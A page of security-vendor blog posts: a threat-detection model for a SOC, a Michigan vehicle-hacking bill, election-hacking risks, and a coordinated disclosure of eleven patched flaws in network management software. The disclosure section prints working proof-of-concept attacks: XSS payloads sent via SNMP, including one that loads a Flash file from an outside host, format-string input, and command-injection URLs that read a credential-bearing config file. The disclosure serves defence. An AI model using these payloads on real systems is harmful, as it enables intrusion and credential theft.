Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

673 posts

[Editor’s Note: This is a sneak peek at what Tim will be presenting at UNITED 2016 in November. Learn more and secure your pass at http://www.unitedsummit.org!]

 

In today’s big data and data science age, you need to think outside the box when it comes to malware and advanced threat protection. For the Analytic Response team at our 24/7 SOC in Alexandria, VA, we use three levels of user behavior analytics to identify and respond to threats. The model is defined as User-Host-Process, or UHP. Using this model and its supporting datasets allows our team to quickly neutralize and protect against advanced threats with a high confidence rate.

What is the User-Host-Process Model?

 

The UHP model supports our incident response and SOC analysts by adding context to every finding and pinpointing anomalous behavior. At its essence, it asks three main questions:

 

  • What users are on the network?
  • What hosts are they accessing?
  • What processes are users running on those hosts?

Advanced threat protection with a UHP model

 

This model also includes several enrichment sources such as operating system anomalies, whitelisting and known evil to help in the decision-making process. Once these datasets are populated, the output from the model can be applied in a variety of different ways.

 

For example, most modern SIEM solutions alert if a user logs in from a new, foreign country IP address. If you need to validate the alert armed only with log files, you’d be hard-pressed to confirm if the activity is malicious or benign.  Our Analytic Response team uses the UHP model to automatically bring in contextual data on users, hosts, and processes to help validate the alert. Here are artifact examples below:

 

  • User Account Information
    • Account created, Active Directory, accessed hosts, public IPs...
  • Host Information
    • Destination host purpose, location, owner, operating system, service pack, criticality, sensitivity...
  • Process Information
    • Process name, process id, parent process id, path, hashes, arguments, children, parents, execution order, network connections...

 

With this supporting data, we build a profiles for each user or artifact found. Circling back to our example “user logged in from a new IP address in a foreign country”, we can add this context:

 

  • Does the user typically log in and behave in this way?
    • Day/time of login, process execution order, duration of login
  • How often does the user run these particular processes?
    • Common, unique, rare
  • How common is this user's authentication onto this system?
  • How often have these processes executed on this system?

 

Armed with UHP model data, we have a baseline of user activity to aid in threat validation. If this user has never logged in from this remote IP, seldom logs into the destination system, and their process execution chain deviates from historical activity, we know that this alert needs further investigation.

 

Analyzing Malware, the UHP Way

 

Adhering to a UHP model means that for every executable, important metadata and artifacts are collected not only during execution, but also as a static binary. When you’re able to compare binary commonality, arguments, execution frequency and other lower level attributes, you now have additional context to make nuanced decisions about suspected malware.

 

For example, for the question, “How unique is a process?”, there are several layers to the question. Let’s look at four:

 

  • Process commonality on a single asset
    • Single host baseline
  • Process commonality at an organizational level
    • Across all of my assets, how many are running this process?
  • Process commonality at an industry/sector level
    • Across organizations in the same vertical, how common is this process?
  • Process commonality for all available datasets.

 

To be most effective, the User, Host, and Process model applies multiple datasets to a specific question to aid in validation. So in the event that the “U” or user dataset finds no anomalies, the next Host layer is applied.  Finally, the Process layer is applied to find anomalies.

 

Use Case: (Webshell)

 

Rapid7 was called to assist on an Incident Response engagement involving potential unauthorized access and suspicious activity on a customer’s public facing web server. The customer had deployed a system running Windows Internet Information Services (IIS) to serve static/dynamic content web pages for their clients.

 

We started the engagement by pulling data around the users in the environment, hosts, and real-time process executions to build up the UHP model. While in this case, User and Host models didn’t detect any initial anomalies, the real-time process tracking, cross process attributes, baselines and context models was able to identify suspicious command-line execution from the parent process w3wp.exe. This process happens to be the IIS process responsible for running the webserver. Using this data, we pivoted to the weblogs, which identified the suspicious web shell being accessed from a remote IP address. From there we were able to thoroughly remediate the attack.

 

Summary

 

The Analytic Response team uses models such as UHP to help automate alert validation and add context to findings. Adding in additional datasets from external sources such as VirusTotal, NSRL and IP related tools helps infuse additional context to the alerts, increasing analyst confidence and slashing incident investigation times. For each of our Analytic Response customers, we take into account their unique user, host, and process profiles. By applying the UHP model during alert triage, hunting and incident response, we can quickly identify and protect against advanced threats and malware in your enterprise quickly and accurately.

 

If you’d like to learn more about Analytic Response, check out our Service Brief [PDF]. If you need Incident Response services, we’re always available: 1-844-RAPID-IR.

Yesterday, the Michigan Senate Judiciary Committee passed a bill – S.B. 0927 – that forbids some forms of vehicle hacking, but includes specific protections for cybersecurity researchers. Rapid7 supports these protections. The bill is not law yet – it has only cleared a Committee in the Senate, but it looks poised to keep advancing in the state legislature. Our background and analysis of the bill is below.

 

In summary:

  • The amended bill offers legal protections for independent research and repair of vehicle computers. These protections do not exist in current Michigan state law.
  • The amended bill bans some forms of vehicle hacking that damage property or people, but we believe this was already largely prohibited under current Michigan state law.
  • The bill attempts to make penalties for hacking more proportional, but this may not be effective.

 

Background

 

Earlier this year, Michigan state Senator Mike Kowall introduced S.B. 0927 to prohibit accessing a motor vehicle's electronic system without authorization. The bill would have punished violations with a potential life sentence. As noted by press reports at the time, the bill's broad language made no distinction between malicious actors, researchers, or harmless access. The original bill is available here.

 

After S.B. 0927 was introduced, Rapid7 worked with a coalition of cybersecurity researchers and companies to detail concerns that the bill would chill legitimate research. We argued that motorists are safer as a result of independent research efforts that are not necessarily authorized by vehicle manufacturers. For example, in Jul. 2015, researchers found serious security flaws in Jeep software, prompting a recall of 1.4 million vehicles. Blocking independent research to uncover vehicle software flaws would undermine cybersecurity and put motorists at greater risk.

 

Over a four-month period, Rapid7 worked rather extensively with Sen. Kowall's office and Michigan state executive agencies to minimize the bill's damage to cybersecurity research. We applaud their willingness to consider our concerns and suggestions. The amended bill passed by the Michigan Senate Judiciary Committee, we believe, will help provide researchers with greater legal certainty to independently evaluate and improve vehicle cybersecurity in Michigan.

 

The Researcher Protections

 

First, let's examine the bill's protections for researchers – Sec. 5(2)(B); pg. 6, lines 16-21. Explicit protection for cybersecurity researchers does not currently exist in Michigan state law, so we view this provision as a significant step forward.

 

This provision says researchers do not violate the bill's ban on vehicle hacking if the purpose is to test, refine, or improve the vehicle – and not to damage critical infrastructure, other property, or injure other people. The research must also be performed under safe and controlled conditions. A court would need to interpret what qualifies as "safe and controlled" conditions – hacking a moving vehicle on a highway probably would not qualify, but we would argue that working in one's own garage likely sufficiently limits the risks to other people and property.

 

The researcher protections do not depend on authorization from the vehicle manufacturer, dealer, or owner. However, because of the inherent safety risks of vehicles, Rapid7 would support a well-crafted requirement that research beyond passive signals monitoring must obtain authorization from the vehicle owner (as distinct from the manufacturer).

 

The bill offers similar protections for licensed manufacturers, dealers, and mechanics [Sec. 5(2)(A); pg. 6, lines 10-15]. However, both current state law and the bill would not explicitly give vehicle owners (who are not mechanics, or are not conducting research) the right to access their own vehicle computers without manufacturer authorization. However, since Michigan state law does not clearly give owners this ability, the bill is not a step back here. Nonetheless, we would prefer the legislation make clear that it is not a crime for owners to independently access their own vehicle and device software.

 

The Vehicle Hacking Ban

 

The amended bill would explicitly prohibit unauthorized access to motor vehicle electronic systems to alter or use vehicle computers, but only if the purpose was to damage the vehicle, injure persons, or damage other property [Sec. 5(1)(c)-(d); pgs. 5-6, lines 23-8]. That is an important limit that should exclude, for example, passive observation of public vehicle signals or attempts to fix (as opposed to damage) a vehicle.

 

Although the amended bill would introduce a new ban on certain types of vehicle hacking, our take is that this was already illegal under existing Michigan state law. Current Michigan law – at MCL 752.795 – prohibits unauthorized access to "a computer program, computer, computer system, or computer network." The current state definition of "computer" – at MCL 752.792 – is already sweeping enough to encompass vehicle computers and communications systems. Since the law already prohibits unauthorized hacking of vehicle computers, it's difficult to see why this legislation is actually necessary. Although the bill’s definition of "motor vehicle electronic system" is too broad [Sec. 2(11); pgs. 3-4, lines 25-3], its redundancy with current state law makes this legislation less of an expansion than if there were no overlap.

 

Penalty Changes

 

The amended bill attempts to create some balance to sentencing under Michigan state computer crime law [Sec. 7(2)(A); pg. 8, line 11]. This provision essentially makes harmless violations of Sec. 5 (which includes the general ban on hacking, including vehicles) a misdemeanor, as opposed to a felony. Current state law – at MCL 752.797(2) – makes all Sec. 5 violations felonies, which is potentially harsh for innocuous offenses. We believe that penalties for unauthorized hacking should be proportionate to the crime, so building additional balance in the law is welcome.

 

However, this provision is limited and contradictory. The Sec. 7 provision applies only to those who "did not, and did not intend to," acquire/alter/use a computer or data, and if the violation can be "cured without injury or damage." But to violate Sec. 5, the person must have intentionally accessed a computer to acquire/alter/use a computer or data. So the person did not violate Sec. 5 in the first place if the person did not do those things or did not do them intentionally. It’s unclear under what scenario Sec. 7 would kick in and provide a more proportionate sentence – but at least this provision does not appear to cause any harm. We hope this provision can be strengthened and clarified as the bill moves through the Michigan state legislature.

 

Conclusion

 

On balance, we think the amended bill is a major improvement on the original, though not perfect. The most important improvements we'd like to see are

  1. Clarifying the penalty limitation in Sec. 7; 
  2. Narrowing the definition of "motor vehicle electrical system" in Sec. 2; and
  3. Limiting criminal liability for owners that access software on vehicle computers they own.

 

However, the clear protections for independent researchers are quite helpful, and Rapid7 supports them. To us, the researcher protections further demonstrate that lawmakers are recognizing the benefits of independent research to advance safety, security, and innovation. The attempt at creating proportional sentences is also sorely needed and welcome, if inelegantly executed.

 

The amended bill is at a relatively early stage in the legislative process. It must still pass through the Michigan Senate and House. Nonetheless, it starts off on much more positive footing than it did originally. We intend to track the bill as it moves through the Michigan legislature and hope to see it improve further. In the meantime, we'd welcome feedback from the community.

Today, we're less than fifty days from the next U.S. presidential election, and over the next couple months, I fully expect to see a lot of speculation over the likelihood of someone "hacking the election." But what does that even mean?

 

The U.S. election system is a massively complex tangle of technology, and, at first, second, and third glance, it appears to embody the absolute worst practices when it comes to information security. There are cleartext, Internet-based entry points to the voting system. There is an aging installed base of voting machines running proprietary, closed-source code, produced by many vendors. And there is a bizarrely distributed model of authority over the election, where no one actually has the power to enforce a common set of security standards.

 

Sure, it seems bad. Nightmarish, really. But what are the actual risks here? If an adversary wanted to "hack" the "election," what could that adversary actually accomplish?

 

Online Voting in the U.S.

According to this PDF report from EPIC, the Verified Voting Foundation, and Common Cause, 32 states have some form of Internet-enabled voting. However, those systems are not the kind of easy, point-and-click kind of interface that most people think of when you say "Internet-enabled." They tend to be systems for distributing ballots that the voter needs to print out on paper (ugh), sign (often with a witness's countersignature), and then email or fax back to the state authority for counting.

 

Systems like these throw up privacy concerns. On a purely technical level, email and fax do not offer any sort of encryption. Ballots cast this way are being passed around the public internet "in the clear," and if an attacker is able to compromise any point along the path of transmission, that attacker can intercept these completed ballots. So, not only does this system do away with any notion of a secret ballot, it does it in such a way that it ignores any modern understanding of cryptographic security.

 

Clearly, this is a bummer for security professionals. We'd much rather see online voting systems with encryption built in. Web sites use HTTPS, an encrypted protocol, to avoid leaking important things like credit card numbers and passwords over public networks, so we'd like we see at least this level of security for something as critical as a voter's ballot.

 

That said, actually attacking this system doesn't scale very well for an adversary. First, they would need to target remote, online voters for snooping and interception. These voters are a minority, since most voting in every state happens either in person, or with paper ballots sent in the regular postal mail. Once the vulnerable population is identified, the adversary would then need to either wait for the voters to cast their ballots in order to change those ballots in transit, or vote on behalf of the legitimate voter before she gets a chance to. Active cleartext attacks like this work pretty well against one person or one location, but they are difficult to pull off at the kind of scale needed to tip an election.

 

Alternatively, the adversary could invent a population of phantom voters, register them to vote remotely, and stuff the ballot box with fake votes. Again, this isn't impossible, but it's also fairly high effort, since voter registration is already somewhat difficult for legitimate voters; automating it at scale just isn't possible in most counties in the U.S..

 

This leaves the servers that are responsible for collecting online ballots. The easiest thing to do here would be to kick them offline with a standard Denial-of-Service (DoS) attack, so all those emailed ballots would be dropped. This sort of attack would be pretty noticeable by the system maintainers, though, and I would expect people would switch back to paper mail pretty quickly. Remember, these systems aren't intended to be used on election day -- they merely collect absentee ballots, so there is going to be plenty of time to switch to the paper-based backup

 

A total compromise of the ballot collection servers could enable attackers to alter or destroy votes in a much sneakier way, and an attack like this could potentially avoid detection until after the election is called. On the bright side, this kind of attack appears possible for only five of the Internet-enabled voting states. Only Alabama, Alaska, Arizona, North Dakota, and Missouri have an "Internet portal." None of these states appear to be battleground states according to FiveThirtyEight's latest projections. So, regardless of their security posture (which isn't known), attacking these portals isn't likely to net a lot of gain for attackers wishing to influence the Presidential election one way or the other. If Florida or Pennsylvania had one of these portals, I'd be a lot more worried.

 

Hacking Voting Machines

Another common theme of "election hacking" stories involves attacking the voting machine directly, in order to alter the votes cast on site. Now, on the one hand, no electronic voting machine is cyber-bulletproof. I have every expectation that these voting computers have some bugs, and some of those bugs weaken the security of the system. I'd love to see open source, auditable voting machine code. Voting is important, and the machines we trust to tabulate results should be trustworthy.

 

On the other hand, if the adversary needs to physically visit voting machines in order to fiddle with results, then he'd need a whole lot of bodies in a whole lot of polling places in order to make a real dent in the results of an election. Don't get me wrong, wireless networking is getting ubiquitous, and high-gain antennae are a thing. But even with ideal placement and transmission power, the attacker is going to need to be within sight of a polling place in order to conduct practical attacks on a WiFi-enabled voting machine.

 

So, while such an attack is remote, it's not sitting-in-another-country remote. More like parked-outside-the-polling-place remote. WiFi voting machines are a terrible idea, but they don't appear to be an existential threat to democracy.

 

Ancillary Attacks: Voter Information

So, rather than attacking ballot-issuing and ballot-counting systems directly, attackers have much more attractive targets available connected to the election. Voter records, for example, are tempting to cyber criminals, since they contain enough personally identifiable information (PII) to kick off identity theft and identity fraud attacks at scale. Unfortunately, those particular cats are already out of the bag. 191 million voter records were accidentally leaked late in 2015, and the FBI warned in August that some state voter databases have suffered breaches.

 

Altering voter registration records is a big deal, for sure, since such attacks can help an adversary actually affect voter turnout for targeted voting blocs. While that's not what's being reported today, such an attack could not only nudge election results one way or another, but possibly bring into question the integrity of the democratic process itself. After all, "voter fraud," despite being practically non-existent in any recent election in the U.S., is a hot-button political topic. If an attack were detected that involved altering voter records, it would almost certainly be seen as a smoking gun that implies systematic voter fraud, therefore undermining confidence in the election for a huge chunk of the electorate. For more on likely voter data attacks, and what voter registration officials can do to safeguard that information, take a look at ST-16001, Securing Voter Registration Data from US-CERT.

 

Perception Matters

Of course, "hacking elections" may not involve actually compromising the balloting or vote counting processes at all.

https://xkcd.com/932/

 

Imagine that someone decided to take down a couple voter information websites. Would this technically interfere with the election process? Maybe, if some people were trying to find out where their polling place is. The obvious effect, though, would be to create the impression that the election is under cyber-attack... and never mind the fact that voter registration and polling place information websites routinely crash under load on election day, despite the best efforts of the people running those sites.

 

So What Can We Do To Secure Elections?

Election infrastructure is complex, and there are certain to be bugs in any complex system. While elections, just like nearly everything else, are made safer, more convenient, and more efficient with technology, that same technology is going to introduce new risks that we've never had to deal with before and haven't anticipated. Naturally, there's cause for concern there, even if it doesn't rise to the level of Total Democolypse.

 

If you're in charge of voting technology in your area, we strongly urge you to test your systems now, ahead of the election. You should be attacking the system to see what's possible, and what mitigations are needed to ensure the election will not be affected by any kinks in the system. If you're not sure where to start, feel free to contact community@rapid7.com - we're happy to connect you with security expertise (either our own or someone else from the security community) that will have a chat with you for free. We all have a vested interest in ensuring voting technology is not compromised, so we want to do what we can to help.

 

If you're a U.S. voter concerned about the integrity of the election process in your district, feel free to get in touch with your local office of elections and ask them what they've done to ensure that the election experience is resilient against cyber threats. If you're a real go-getter, I encourage you to volunteer with your county as a poll worker, and see what's going on behind the scenes, up close. Every county always needs help around election day, and I can attest that my own experience as an election judge was a fun and rewarding way to protect democracy without being particularly partisan.



NOTE: A version of this essay first appeared in CSM Passcode. You can read that version here: Opinion: Think hackers will tip the vote? Read this first - CSMonitor.com .

As you may recall, back in December Rapid7 disclosed six vulnerabilities that affect four different Network Management System (NMS) products, discovered by Deral Heiland of Rapid7 and independent researcher Matthew Kienow. In March, Deral followed up with another pair of vulnerabilities for another NMS. Today, we're releasing a new disclosure that covers 11 issues across four vendors. As is our custom, these were all reported to vendors and CERT for coordinated disclosure.

 

While this disclosure covers a wide range of vulnerabilities discovered (and fixed), the theme of injecting malicious data via SNMP to ultimately gain control of NMS web console browser windows became overwhelming obvious, and deserving of a more in-depth look. To that end, today, Rapid7 would like to offer a complete research report on the subject. From Managed to Mangled: SNMP Exploits for Network Management Systems by Deral, Matthew, and yours truly is available for download here, and we'd love to hear your feedback on this technique in the comments below. We'll all be at DerbyCon as well, and since Matthew and Deral be presenting these findings on Saturday, September 24th, 2016, it will be a fine time to chat about this.

 

Incidentally, we're quite pleased that every one of these vendors have issued patches to address these issues well before our planned disclosure today. All acted reasonably and responsibly to ensure their customers and users are protected against this technique, and we're confident that going forward, NMSs will do a much better job of inspecting and sanitizing machine-supplied, as well as user-supplied, input.

 

With that, let's get on with the disclosing!

 

Rapid7 IdentifierCVE IdentifierClassVendorPatched
R7-2016-11.1CVE-2016-5073XSSCloudViewVersion 2.10a
R7-2016-11.2CVE-2016-5073XSSCloudviewVersion 2.10a
R7-2016-11.3CVE-2016-5074Format StringCloudviewVersion 2.10a
R7-2016-11.4CVE-2016-5075XSSCloudviewVersion 2.10a
R7-2016-11.5CVE-2016-5076DOACloudviewVersion 2.10a
R7-2016-12CVE-2016-5077XSSNetikusVersion 3.2.1.44
R7-2016-13CVE-2016-5078XSSPaesslerVersion 16.2.24.4045
R7-2016-14.1CVE-2016-5642XSSOpmantekVersions 8.5.12G
R7-2016-14.2CVE-2016-5642XSSOpmantekVersions 8.5.12G, 4.3.7c
R7-2016-14.3CVE-2016-5642XSSOpmantekVersions 8.5.12G, 4.3.7c
R7-2016-14.4CVE-2016-6534Cmd InjectionOpmantekVersions 8.5.12G, 4.3.7c

 

R7-2016-11: Multiple Issues in CloudView NMS

CloudView NMS versions 2.07b and 2.09b is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability over SNMP agent responses and SNMP trap messages, a format string vulnerability in processing SNMP agent responses, a format string vulnerability via telnet login, and an insecure direct object reference issue. These issues were resolved in version 2.10a, available from the vendor. None of these issues require any prior authentication to exploit.

 

These issues were discovered by Deral Heiland of Rapid7, Inc.

 

R7-2016-11.1: XSS via SNMP Agent Responses (CVE-2016-5073)

While examining the Network Management System (NMS) software Cloudview NMS, it was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within CloudView’s web management interface. When this data (JavaScript) is viewed within the web console the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the systems configuration, compromise data, take control of the product or launch attacks against the authenticated users hosts system.

 

The first persistent XSS vulnerability is delivered via the network SNMP discovery process. If the network device that is discovered, during the discovery process, is configured with SNMP and the SNMP OID object sysDescr 1.3.6.1.2.1.1.1 contain HTML or JavaScript code within that field and the discovered device is imported into the database, then code will be delivered to the product for persistent display and execution.

 

The following example shows the results of discovering a network device where the SNMP sysDescr has been set to <SCRIPT>alert("XSS-sysDescr")<SCRIPT>. In this example, when device is viewed within web console "Device List screen" the JavaScript executes, rendering an alert box within the authenticated users web browser.

cv-figure1.png

 

 

R7-2016-11.2: XSS via SNMP Trap Messages (CVE-2016-5073)

The second method of injection involves SNMP trap messages. The CloudView product allows unsolicited traps, which are stored within the logs. A malicious actor can inject HTML and JavaScript code into the product via SNMP trap message. When the SNMP trap message information is viewed the code will execute within the context of the authenticated user. Figure 2 shows an example attack where a trap message was used with the HTML code <embed src=//ld1.us/4.swf> to embed flash into the CloudView web console.

cv-figure2.png

 

R7-2015-11.3: Format String Vulnerability via SNMP (CVE-2016-5074)

Cloudview NMS was also discovered to be vulnerable to a format string vulnerability. This vulnerability allows a malicious actor to inject format string specifiers into the product via the SNMP sysDescr field. If successfully exploited, this could allow a malicious actor to execute code or trigger a denial of service condition within the application. The following Ollydbg screen shot (Figure 3) shows a series of %x that were used within the SNMP sysDescr field of a discovered device to enumerate the stack data from the main process stack and trigger a access violation with %s.

cv-figure5.png

 

R7-2015-11.4: XSS via Telnet Login (CVE-2016-5075)

A third method was discovered for injecting persistent XSS in the username field of the Remote CLI telnet on port TCP 3082. A malicious actor with network access to this port could inject Javascript or HTML code into the event logs using failed login attempts as shown below:

cv-figure3.png

cv-figure4.png

 

R7-2015-11.5: Direct Object Access (CVE-2016-5076)

During testing it was also discovered that access to file within the Windows file systems where accessible without proper authentication. This allowed for full file system access on the Windows 2008 server systems running the product. In the following example, the URL http://192.168.2.72/MPR=:/server_rootC:/CloudView/data/admin/auto.def was used to retrieve the configuration file "auto.def" on the server without authentication.

cv-figure6.png

 

Disclosure Timeline

Mon, May 23, 2016 : Initial contact to vendor

Mon, May 23, 2016 : Vendor responded with security contact

Mon, May 23, 2016 : Details provided to vendor security contact

Sun, Jun 05, 2016: Version 2.10a published by the vendor

Thu, Jun 09, 2016 : Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5073, CVE-2016-5074, CVE-2016-5075, CVE-2016-5076 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-12: XSS via SNMP Trap Messages in Netikus EventSentry (CVE-2016-5077)

Netikus EventSentry NMS versions 3.2.1.8, 3.2.1.22, and 3.2.1.30 are vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This issue was fixed in version 3.2.1.44, available from the vendor. This issue does not require any prior authentication to exploit.

 

This issue was discovered by Deral Heiland of Rapid7, Inc.

 

Exploitation

While examining the Network Management System (NMS) software EventSentry, It was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within EventSentry's web management interface. When this data (JavaScript) is viewed within the web console the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the systems configuration, compromise data, take control of the product or launch attacks against the authenticated user's host system.

 

This injection was conducted using unsolicited SNMP trap messages, which are stored within the SNMP logs on EventSentry. A malicious actor can inject HTML and JavaScript code into the product via SNMP trap message. When the SNMP trap message information is viewed, the code will execute within the context of the authenticated user. By using the following snmptrap command, it was possible to inject the following HTML code <embed src=//ld1.us/ 4.swf> to embed flash into the EventSentry web console SNMP logs:

 

snmptrap -v 1 -c public 192.168.2.72 '1' '192.168.2.68' 6 99 '55' 1 s "<embed src=//ld1.us/4.swf>"

 

netikus-figure1.png

 

Disclosure Timeline

Mon, May 23, 2016 : Initial contact to vendor

Mon, May 23, 2016 : Vendor responded with security contact

Mon, May 23, 2016 : Details provided to vendor security contact

Fri, May 27, 2016: Version 3.2.1.44 published by the vendor

Thu, Jun 09, 2016 : Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5077 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-13: XSS via SNMP in Paessler PRTG (CVE-2016-5078)

Paessler PRTG NMS version 16.2.24.3791 is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This issue does not require any prior authentication to exploit, and was fixed in version 16.2.24.4045, available from the vendor.

 

This issue was discovered by Deral Heiland of Rapid7, Inc.

 

Exploitation

While examining the Network Management System (NMS) software PRTG, it was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within PRTG’s Network Monitor web management interface. When this data (JavaScript) is viewed within the web console the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the system configuration, compromise data, take control of the product or launch attacks against the authenticated user's host system.

 

The persistent XSS vulnerability is delivered via the network SNMP discovery process of a device. If the network device that is discovered contains JavaScript or HTML code specified as the following SNMP OID objects, then the code will be rendered within the context of the authenticated user who views the “System Information” web page of the discovered device.

 

sysDescr    1.3.6.1.2.1.1.1.0
sysLocation 1.3.6.1.2.1.1.6.0
sysContact  1.3.6.1.2.1.1.4.0

 

The following example shows the results of discovering a network device where the SNMP sysDescr has been set to <embed src=//ld1.us/4.swf>. In this example, when a device's "System Information" web page is viewed in the web console, the HTML code will download and render the Flash file in the authenticated users web browser.

pa-figure1.png

 

Disclosure Timeline

Mon, May 23, 2016 : Initial contact to vendor

Tue, May 24, 2016 : Vendor responded with security contact

Tue, May 24, 2016 : Details provided to vendor security contact

Mon, Jun 06, 2016: Version 16.2.24.4045/4046 released by the vendor

Thu, Jun 09, 2016 : Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5078 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-14: Multiple Issues in Opmantek NMIS

Opmantek NMIS NMS versions 8.5.10G and 4.3.6f are vulnerable to a persistent Cross Site Scripting (XSS) vulnerability over SNMP agent responses and SNMP trap messages, a reflected XSS vulnerability over SNMP agent responses, and a command injection vulnerability. These issues were fixed in versions 8.5.12G and 4.3.7c, available from the vendor.

 

All three of the XSS attack methods allow an unauthenticated adversary to inject malicious content into the user’s browser session. This could cause arbitrary code execution in an authenticated user's browser session and may be leveraged to conduct further attacks. The code has access to the authenticated user's cookies and would be capable of performing privileged operations in the web application as the authenticated user, allowing for a variety of attacks.

 

These issues were discovered by independent researcher Matthew Kienow. Note that all three XSS vectors have been assigned the same CVE identifier.

 

R7-2016-14.1, XSS Injection via SNMP Trap Messages (CVE-2016-5642)

First, a stored (AKA Persistent or Type I) server XSS vulnerability exists due to insufficient filtering of SNMP trap supplies data before the affected software stores and displays the data. Traps that will be processed by NMIS version 8.x depend on the configuration of snmptrapd, the Net-SNMP trap notification receiver. This component may be configured to accept all incoming notifications or may be constrained by defined access control. In the latter case, the adversary must determine the SNMP authorization credentials before launching the attack. Note that NMIS version 4.x does not have the capability of inspecting trap messages, so is unaffected by this issue.

 

The example configuration for Net-SNMP's snmptrapd <nmisdir>/install/snmptrapd.conf, which ships with NMIS, contains the line "disableAuthorization yes." This directive disables access control checks and accepts all incoming notifications. The affected software is capable of accepting traps from hosts registered or unknown to the system. The stored XSS payload is delivered to the affected software via an object in the malicious SNMP trap. Once the trap is processed it is stored in the SNMP Traps Log. The XSS payload will execute when the user navigates to the SNMP Traps Log widget by clicking on the Service Desk > Logs > Log List menu item, and then clicking the SNMP_Traps link in the List of Available Logs window that appears. The user may also navigate to the non-widget SNMP Traps Log page at http://host:port/cgi-nmis8/logs.pl?conf=Config.nmis&act=log_file_view&logname=SN MP_Traps&widget=false.

om-figure1.png

 

R7-2016-14.2, XSS Injection via SNMP Agent Responses (CVE-2016-5642)

Second, a stored server XSS vulnerability exists due to insufficient filtering of SNMP agent supplied data before the affected software stores and displays the data. The stored XSS payload is delivered to the affected software during the SNMP data collect operation performed when adding and updating a node. The malicious node utilizes an SNMP agent to supply the desired XSS payload in response to SNMP GetRequest messages for the sysDescr (1.3.6.1.2.1.1.1), sysContact (1.3.6.1.2.1.1.4) and sysLocation (1.3.6.1.2.1.1.6) object identifiers (OIDs). The XSS payload provided for the sysDescr object will execute when the add and update node operation is complete and the results are displayed.

 

The XSS payload provided for the sysLocation object will execute when the user clicks the Network Status > Network Metrics and Health menu item and then clicks on the link for the malicious node's group. After the Node List and Status window appears, if the user clicks on the link for the malicious node the XSS payload for the sysLocation, sysContact and sysDescr objects execute before the Node Details window appears. If the user keeps the malicious node's Node Details window open it updates at a set interval causing all three XSS payloads to execute repeatedly.

om-figure2.png

 

R7-2016-14.3, Reflected XSS Injection via SNMP Agent Responses (CVE-2016-5642)

Third, a reflected (AKA Non-Persistent or Type II) client XSS vulnerability exists due to insufficient filtering of SNMP agent supplied data before the affected software displays the data. The reflected XSS payload is delivered to the affected software during the SNMP Tool walk operation. Any XSS payloads contained in walked OIDs will execute when the results are displayed. Note, the SNMP Tool is not available in NMIS version 4.3.6f.

om-figure4.png

 

R7-2016-14.4, Web Application Command Injection

Finally, a command injection vulnerability in the web application component of Opmantek Network Management Information System (NMIS) exists due to insufficient input validation. In NMIS version 8.5.10G the command injection vulnerability exists in the tools.pl CGI script via the "node" parameter when the "act" parameter is set to "tool_system_finger". The user must be authenticated and granted the tls_finger permission, which does not appear to be enabled by default. However, the software is vulnerable if the tls_finger permission is granted to the authenticated user in the <NMIS Install Dictory>/conf/Access.nmis file. A sample tls_finger permission is defined as follows:

 

'tls_finger' => {
    'descr' => 'Permit Access tool finger',
    'group' => 'access',
    'level0' => '1',
    'level1' => '0',
    'level2' => '1',
    'level3' => '1',
    'level4' => '1',
    'level5' => '0',
    'name' => 'tls_finger'
  }

 

In NMIS version 4.3.6f the command injection vulnerability exists in the admin.pl CGI script via the "node" parameter when the "admin" parameter is set to either "man", "finger", "ping", "trace" or "nslookup". This is exploitable without authentication in the default configuration, since NMIS authentication is not required by default as specified in the <NMIS Install Dictory>/conf/nmis.conf file.

 

#authentication stuff
#
# set this to true to require authentication (default=false)
auth_require=false

 

NMIS version 8.5.10G Exploitation

An authenticated user that has been granted the tls_finger permission requests the URL http://host:port/cgi-nmis8/tools.pl?conf=Config.nmis&act=tool_system_finger&node =%3Bcat%20%2Fusr%2Flocal%2Fnmis8%2Fconf%2FConfig.nmis to dump the NMIS configuration file, as shown below. The config file contains cleartext usernames and passwords for the outgoing notification mail server and NMIS database server, as shown below.

om-figure5.png

 

NMIS version 4.3.6f Exploitation

An unauthenticated individual with access to the NMIS server requests the URL http://host:port/cgi-nmis4/admin.pl?admin=finger&node=%3Bwhoami to output the user name associated with the effective user ID of the web server process, as shown below.

 

om-figure6.png

 

Disclosure Timeline

Wed, Jun 01, 2016 : Initial contact to vendor

Thu, Jun 02, 2016 : Vendor responded with security contact

Thu, Jun 02, 2016 : Details provided to vendor security contact

Mon, Jun 13, 2016: Versions 4.3.7c and NMIS 8.5.12G released by the vendor

Wed, Jun 22, 2016 : Disclosed to CERT, tracked as VR-228

Wed, Jun 22, 2016: CVE-2016-5642 assigned by CERT

Tue, Sep 06, 2016: CVE-2016-6534 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

More Information for All Issues

All of these described issues have been fixed by their respective vendors, so users are encouraged to update to the latest versions. For a more in-depth exploration of the SNMP-vectored issues, readers are encourage to download the accompanying paper, From Managed to Mangled: SNMP Exploits for Network Management Systems.

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in this area.

 

Protocol Overview

Originally conceived in the early 1980s, NetBIOS is a collection of services that allows applications running on different nodes to communicate over a network.  Over time, NetBIOS was adapted to operate on various network types including IBM's PC Network, token ring, Microsoft's MS-Net, Novell NetWare IPX/SPX, and ultimately TCP/IP.


